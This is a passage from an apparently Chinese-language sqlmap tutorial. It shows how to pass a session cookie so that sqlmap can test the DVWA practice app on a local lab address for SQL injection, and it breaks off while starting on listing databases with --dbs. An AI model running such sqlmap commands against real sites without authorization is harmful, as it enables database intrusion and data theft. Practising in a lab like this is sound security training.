0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入
参数:--cookie="you cookie"
伪命令:
sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie"
使用演示:
因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的
sqlmap
--url=
"192.168.64.129:8000/DVWA0/vulnerabilities/sqli/?id=1&Submit=#"
--cookie=
"security=low; ASPSESSIONIDCAQATSAR=FDGHDGHDGAJFFCDCAKCIHFPP;
echo=lao=True; PHPSESSID=ee4d0b24edece51d69c478a7f475f365"
回显:
通过sqlmap的回显,可以看出目标站的url是可被注入的,并且给出了操作系统Windows,Web服务器的指纹和使用的数据库指纹
1.获取目标数据库的数据库名
sqlmap参数:--dbs
sqlmap
--url